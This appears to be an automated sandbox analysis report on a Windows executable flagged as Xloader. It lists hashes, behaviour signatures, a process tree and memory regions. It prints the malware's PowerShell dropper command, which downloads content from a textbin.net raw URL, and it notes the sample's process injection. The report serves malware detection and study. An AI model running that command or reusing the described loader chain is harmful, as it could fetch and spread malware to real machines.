Analysis
-
max time kernel
136s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
07-07-2022 12:33
Static task
static1
General
-
Target
38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
-
Size
806KB
-
MD5
2a552d3676776043ba816a122691e003
-
SHA1
29f799ce2d6e4268603e5ca310621eda23b92bd7
-
SHA256
38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a
-
SHA512
55eb70369368044a654578a703e0856cdc505d2e312dd488216937ca2149f45b785610727713c713b87846f79840e0034cce7aa533fe05a37eb1911a8f331fbf
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://textbin.net/raw/a3gbusy118
Signatures
-
Xloader payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3484-147-0x0000000000700000-0x000000000072C000-memory.dmp xloader -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 3584 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exedescription pid process target process PID 1636 set thread context of 3484 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3332 3484 WerFault.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exe38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exepid process 3584 powershell.exe 3584 powershell.exe 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exe38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exedescription pid process Token: SeDebugPrivilege 3584 powershell.exe Token: SeDebugPrivilege 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.execmd.exedescription pid process target process PID 1636 wrote to memory of 2580 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe cmd.exe PID 1636 wrote to memory of 2580 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe cmd.exe PID 1636 wrote to memory of 2580 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe cmd.exe PID 2580 wrote to memory of 3584 2580 cmd.exe powershell.exe PID 2580 wrote to memory of 3584 2580 cmd.exe powershell.exe PID 2580 wrote to memory of 3584 2580 cmd.exe powershell.exe PID 1636 wrote to memory of 3484 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe PID 1636 wrote to memory of 3484 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe PID 1636 wrote to memory of 3484 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe PID 1636 wrote to memory of 3484 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe PID 1636 wrote to memory of 3484 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe PID 1636 wrote to memory of 3484 1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe"C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c powershell -Command "(New-Object Net.WebClient).DownloadString('https://textbin.net/raw/a3gbusy118')"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadString('https://textbin.net/raw/a3gbusy118')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe"C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 1843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3484 -ip 34841⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1636-130-0x0000000000D90000-0x0000000000E5E000-memory.dmpFilesize
824KB
-
memory/1636-131-0x0000000005D70000-0x0000000006314000-memory.dmpFilesize
5.6MB
-
memory/1636-132-0x0000000005650000-0x00000000056E2000-memory.dmpFilesize
584KB
-
memory/1636-133-0x00000000056F0000-0x000000000578C000-memory.dmpFilesize
624KB
-
memory/1636-144-0x0000000005880000-0x000000000588A000-memory.dmpFilesize
40KB
-
memory/2580-134-0x0000000000000000-mapping.dmp
-
memory/3484-147-0x0000000000700000-0x000000000072C000-memory.dmpFilesize
176KB
-
memory/3484-145-0x0000000000000000-mapping.dmp
-
memory/3584-138-0x00000000052D0000-0x00000000052F2000-memory.dmpFilesize
136KB
-
memory/3584-139-0x00000000059C0000-0x0000000005A26000-memory.dmpFilesize
408KB
-
memory/3584-140-0x0000000005B60000-0x0000000005BC6000-memory.dmpFilesize
408KB
-
memory/3584-141-0x0000000006180000-0x000000000619E000-memory.dmpFilesize
120KB
-
memory/3584-143-0x0000000006670000-0x000000000668A000-memory.dmpFilesize
104KB
-
memory/3584-142-0x00000000079B0000-0x000000000802A000-memory.dmpFilesize
6.5MB
-
memory/3584-137-0x0000000005320000-0x0000000005948000-memory.dmpFilesize
6.2MB
-
memory/3584-136-0x0000000002BA0000-0x0000000002BD6000-memory.dmpFilesize
216KB
-
memory/3584-135-0x0000000000000000-mapping.dmp